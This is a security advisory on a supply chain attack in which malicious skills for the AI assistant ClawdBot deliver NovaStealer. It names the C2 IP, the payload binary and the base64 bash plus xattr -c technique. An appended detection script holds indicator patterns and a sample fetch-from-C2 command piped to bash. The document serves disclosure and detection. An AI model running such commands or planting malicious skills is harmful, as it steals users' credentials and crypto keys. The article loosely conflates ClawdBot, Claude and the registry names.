ClawdBot AI Ecosystem Hit by Massive Supply Chain Attack Distributing NovaStealer
Take action: If you use ClawdBot, be extremely cautious and isolate it. Never run it on a primary computer and only give it very limited access. Be extremely careful about installing third-party skills, especially any related to cryptocurrency trading or web automation. Review your shell history for connections to the malicious IP (91.92.242.30), search your system for the "dx2w5j5bka6qkwxi" binary, and if found, assume your credentials and crypto keys are compromised and rotate them immediately.
ClawdBot, an open-source AI personal assistant, is already being abused in a large-scale supply chain attack involving 386 malicious skills published to the ClawHub and GitHub registries.
Claude's skills are pre-built instruction manuals/prompt files that contain best practices and step-by-step guidance for specific tasks like creating Word documents, Excel spreadsheets, PowerPoints, and PDFs, which Claude reads before performing those tasks. The ClawdBot ecosystem allows third parties to upload skills to the skill repository, and anyone can download them to their ClawdBot.
The campaign primarily targets cryptocurrency traders and developers using platforms such as ByBit, Polymarket, and Axiom, exploiting the trust users place in local AI extensions.
Attackers used multiple aliases, including "hightower6eu" and "aslaep123," to publish skills that appear to automate trading or summarize web content. On macOS, these skills prompt users to run base64-encoded bash commands that download payloads from a command-and-control (C2) server located at 91.92.242.30. These commands frequently use the xattr -c utility to strip quarantine attributes, bypassing Apple's Gatekeeper security. Windows users are tricked into downloading password-protected ZIP files from GitHub releases containing executables disguised as mandatory authentication tools.
The compromised data includes:
- Cryptocurrency exchange API keys and wallet private keys
- Wallet seed phrases and browser extension data (e.g., MetaMask)
- macOS Keychain data and browser-saved passwords
- SSH private keys and cloud provider credentials (AWS, Google Cloud)
- Git credentials and environment configuration files (.env)
The "hightower6eu" account alone recorded over 7,000 downloads before being removed. Security researchers have identified the primary payload as a variant of the NovaStealer malware family.
ClawHub administrator Peter Steinberger acknowledged the platform's current inability to effectively secure the registry against these malicious uploads. Despite the public disclosure, many malicious skills remained available in the official MoltHub GitHub repository for several days.
Users are urged to inspect their shell history for any connections to the malicious C2 infrastructure.
This incident is a reminder of the significant risks inherent in executing third-party code that runs on your system with high privileges. Users can check for infection by searching for the "dx2w5j5bka6qkwxi" binary or related network artifacts.
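The checks described above (shell history for the C2 address, the payload name, and base64-wrapped commands that call xattr -c) can be scripted so that indicators hidden inside encoded commands are also found. The following is an added example, not code from ClawdBot, ClawHub or the researchers; the function names, the 24-character base64 threshold and the constructed sample history are assumptions of this example.

```python
import base64
import binascii
import re

# Indicators quoted in this article; the dictionary keys are this example's own labels.
INDICATORS = {
    "c2_ip": re.compile(r"\b91\.92\.242\.30\b"),
    "payload_name": re.compile(r"dx2w5j5bka6qkwxi"),
    "quarantine_strip": re.compile(r"\bxattr\s+-c\b"),
}
# Assumed threshold: runs of 24+ base64 characters can hold a short shell command.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_candidates(line):
    """Yield text recovered from base64-looking runs in one line."""
    for run in B64_RUN.findall(line):
        try:
            yield base64.b64decode(run, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64, or decodes to binary: ignore


def scan(text):
    """Return sorted (line_no, indicator, layer) hits; layer is 'plain' or 'base64'."""
    hits = set()
    for no, line in enumerate(text.splitlines(), 1):
        layers = [("plain", line)]
        layers += [("base64", decoded) for decoded in decode_candidates(line)]
        for layer, content in layers:
            for name, pattern in INDICATORS.items():
                if pattern.search(content):
                    hits.add((no, name, layer))
    return sorted(hits)


# Constructed sample shell history (not real data); placeholders keep it inert.
_ENCODED = base64.b64encode(
    b"curl http://91.92.242.30/<placeholder> ; xattr -c <placeholder>"
).decode()
SAMPLE = "\n".join([
    "git status",
    "echo '" + _ENCODED + "' | base64 -D | bash",
    "ls -la ~/Downloads",
])

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Pass the contents of a shell history file or a downloaded skill file to scan(); a hit on the base64 layer means the indicator was only visible after decoding, which a plain text search of the same file would miss.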